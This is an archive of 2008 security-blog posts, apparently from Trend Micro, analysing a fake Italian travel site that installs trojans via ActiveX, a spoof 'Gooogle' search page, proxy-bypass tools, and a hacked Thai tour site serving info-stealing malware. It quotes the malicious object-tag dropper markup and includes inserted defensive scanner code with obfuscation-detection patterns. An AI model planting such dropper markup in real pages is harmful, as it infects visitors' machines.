Archive for February 1st, 2008

Another Italian Job… or a Gooogle Job?

February 1st, 2008 by Loucif Kharouni (Threats Analyst)

Yesterday we received reports of a malicious Web site that targets Italian users. This particular site purports to be a tour and travel operator for India:

The malicious source is similar to:

<object classid="clsid:0F5FBC88-CC6A-48e8-B037-E37763D0482B" codebase="http://www.{BLOCKED}elettronici.com/indiatouroperator/registrazione.exe">
</object>

The file registrazione.exe is detected as TROJ_AGENT.AAFY, and the page that hosts it is detected as HTML_AGENT.AAFX.

Once the file “Registrazione” is installed on a system, it automatically redirects the browser to a horoscope Web site, which has nothing to do with a travel tour operator:

Note that the file registrazione.exe (TROJ_AGENT.AAFY) downloads other malware components, such as TROJ_AGENT.ZTH.

After the download and installation are completed, the browser indicates that an error occurred while loading the “desired” Web site. The easiest and fastest way to continue when the Internet Explorer (IE) browser crashes is to open a new browser window; upon doing so, however, the user will find that the IE start page now points to a new Web site, www.qoogler.com, which poses as the legitimate Google Web site:

As anyone may wonder, this is not a typographical error on our part: it is indeed “qoogler.com” that poses as the Google search engine. Have a closer look at the page and note that Google has become “GOOOGLE”. It also has an “AstroGooogle” link, which sends you back to the astrology Web site mentioned above. This is another social engineering technique that this malware employs to fool users into downloading its components.

Here’s the HTML code for the malicious page:

</HEAD> <object classid="CLSID:0D95404C-C067-4ecf-BB6D-AB6008717183" codebase="GobbaEvo.exe" width="1" height="1"> </object><BODY text=#000000 vLink=#551a8b aLink=#ff0000 link=#0000cc bgColor=#ffffff>

<CENTER> <br> <IMG height=74 alt=Google src="images/nav_logo.gif" mce_src="images/nav_logo.gif" width=226><BR> <BR> <form name="form1" method="post" action="./index.asp"> <TABLE cellSpacing=0 cellPadding=4 border=0> <TBODY>
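Both snippets above deliver their payload the same way: an ActiveX <object> whose codebase points straight at an .exe instead of the signed .cab Internet Explorer normally fetches. The following scanner, an added example that is not Trend Micro's code, flags that pattern in saved HTML; the sample markup is constructed from the quoted snippets, with the blocked host replaced by a placeholder.

```python
"""Flag <object> tags whose codebase points at a raw executable."""
from html.parser import HTMLParser
from urllib.parse import urlparse

EXECUTABLE_SUFFIXES = (".exe", ".scr", ".com", ".pif", ".bat")


class ObjectCodebaseScanner(HTMLParser):
    """Collect <object> tags with an executable codebase."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "object":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        codebase = a.get("codebase", "").strip()
        if not codebase:
            return
        # urlparse drops the "#version=..." fragment a legitimate CAB uses,
        # so only the file extension of the path is examined.
        path = urlparse(codebase).path.lower()
        if path.endswith(EXECUTABLE_SUFFIXES):
            self.findings.append({
                "classid": a.get("classid", ""),
                "codebase": codebase,
                # 1x1 or 0x0 objects are a common sign of a hidden dropper
                "hidden": a.get("width") in ("0", "1")
                          and a.get("height") in ("0", "1"),
            })


def scan_html(html):
    """Return a list of findings for every suspicious <object> in html."""
    parser = ObjectCodebaseScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: the two droppers from this post plus a benign CAB
# (the host name and the third classid are placeholders, not real values).
SAMPLE = """<object classid="clsid:0F5FBC88-CC6A-48e8-B037-E37763D0482B"
  codebase="http://www.example.invalid/indiatouroperator/registrazione.exe"></object>
<object classid="CLSID:0D95404C-C067-4ecf-BB6D-AB6008717183"
  codebase="GobbaEvo.exe" width="1" height="1"></object>
<object classid="clsid:PLACEHOLDER-BENIGN"
  codebase="http://www.example.invalid/plugin.cab#version=1,0,0,0"></object>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```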

The file GobbaEvo.exe is also detected as TROJ_AGENT.AAFX. In the infection stage, when the user tries to search for “trendmicro” (for example) using Gooogle, he might get the following result:

The search result page asks for installation of a new program to resolve yet another issue with Internet Explorer. The downloaded file is, of course, yet another malware that redirects the user to an adult page, but still under the guise of qoogler.com.

Proxy Surfing Tools: Threats to Browsing Security

February 1st, 2008 by Henry Artuz (Threats Analyst)

A proxy server, by definition, is a network service that allows clients to make indirect network connections to other network services like the Internet, giving users the freedom of browsing the Web.

The use of firewall/Web filtering applications by corporations, organizations, universities and even countries shows that each is willing to spend a lot of money on Internet censorship to block malicious Web sites, or sites that are unrelated or inappropriate to its business needs (e.g. porn sites).

However, there exists software on the Web today that claims to be able to bypass firewall rules and Web filtering policies. These tools, namely Freegate, GPass, GTunnel and UltraSurf, may seem attractive because they let a configured browser reach Web sites like Facebook, MySpace and YouTube even when those sites are blocked by a firewall or Web filter (for instance, on office workstations). However, as with any unendorsed software freely available over the Internet, using these tools opens the affected network to possible attack.

Trend Micro recently detected one of these proxy surfing tools (UltraSurf) as HKTL_PROXSURF.A using spyware pattern file version TMAPTN 576.34. These tools only need a Firefox browser and a plugin proxy toolbar that enables a user to switch to a different proxy surfing tool.

The following are screenshots of the said utilities in action:

In any case, freedom of Web browsing should always be governed by the restrictions and limits set in the organization’s internal policies, to guard against the threats that are always present on the World Wide Web.

Udiya Northern Thailand Tours Site Feels the PINCH

February 1st, 2008 by Joseph Pacamarra (Threats Analyst)

Research Project Manager Ivan Macalintal discovered a few hours ago that a Thailand-based tourism and travel site appears to have been compromised to serve malware. This discovery follows closely on the heels of the Thai Royal Air Force site compromise just a week ago.

Looking at the season, summer holidays are coming up soon in Asia and Bangkok is a strong contender for being the most popular Asian tourist spot. Malware authors may therefore be counting on this to drive traffic to the hacked site.

Clicking the link on the landing page of the Udiya Tour of Northern Thailand Web site redirects the user’s browser to a certain URL, which in turn redirects to yet another URL containing multiple browser exploits, ultimately leading to the download of a file named UPDATE.EXE. The said file is a variant of the LDPINCH family, which is known for its information theft routines.

Upon analysis, it was found that several of the pages from the same site have been compromised, including the site’s contact, reservation and package details pages. Macalintal describes the said pages as “full of highly-obfuscated JavaScript badness, injected and scattered all over, just before and after the HTML, some META and TITLE tags.”
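The injected code is described as sitting outside the normal document, before and after the HTML itself. As an added example (not Trend Micro's or ThaiCERT's code), the scanner below locates script blocks placed before the <html> tag or after </html> and scores each for common obfuscation markers; the sample page is constructed, and its script bodies are harmless placeholders rather than the real injection.

```python
"""Locate <script> blocks injected outside the document element."""
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

# Markers frequently seen in obfuscated injections; each hit adds one point.
OBFUSCATION_MARKERS = (
    re.compile(r"\beval\s*\(", re.I),
    re.compile(r"\bunescape\s*\(", re.I),
    re.compile(r"fromCharCode", re.I),
    re.compile(r"(?:%[0-9a-f]{2}){8,}", re.I),    # long %xx escape runs
    re.compile(r"(?:\\x[0-9a-f]{2}){8,}", re.I),  # long \xNN escape runs
)


def find_misplaced_scripts(html):
    """Return scripts that sit before <html> or after </html>, with a score."""
    lower = html.lower()
    html_open = lower.find("<html")
    html_close = lower.rfind("</html>")
    findings = []
    for match in SCRIPT_RE.finditer(html):
        before = html_open != -1 and match.start() < html_open
        after = html_close != -1 and match.start() > html_close
        if not (before or after):
            continue  # script inside the document; not this heuristic's job
        body = match.group(1)
        score = sum(1 for pat in OBFUSCATION_MARKERS if pat.search(body))
        findings.append({
            "offset": match.start(),
            "position": "before" if before else "after",
            "score": score,
        })
    return findings


# Constructed sample: one block before <html>, one benign block inside the
# body, and one block after </html>. The payloads are placeholders only.
SAMPLE = (
    "<script>eval(unescape('%61%6c%65%72%74%28%31%29%3b%3b'));</script>\n"
    "<html><head><title>Udiya</title></head>"
    "<body><script>var a = 1;</script></body></html>\n"
    "<script>document.write(String.fromCharCode(104, 105));</script>"
)

if __name__ == "__main__":
    for finding in find_misplaced_scripts(SAMPLE):
        print(finding)
```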

Trend Micro users with updated patches are protected from this threat. We already detect this malware as TSPY_LDPINCH.FE using pattern file number 4.974.05.

Thanks to Network Architect Paul Ferguson for contacting ThaiCERT about this site compromise.

